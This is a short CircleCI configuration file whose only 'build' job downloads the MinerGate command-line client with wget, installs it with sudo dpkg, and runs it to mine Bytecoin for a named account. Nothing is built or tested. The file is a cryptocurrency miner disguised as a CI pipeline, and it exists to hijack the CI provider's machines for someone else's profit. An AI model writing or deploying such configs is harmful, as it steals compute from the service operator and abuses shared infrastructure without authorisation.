version: 2
jobs:
  build:
    machine: true

    steps:
      - run: wget https://minergate.com/download/deb-cli -O yogi-cli.deb
      - run: sudo dpkg -i yogi-cli.deb
      - run: minergate-cli -user yoginth@aol.com bcn
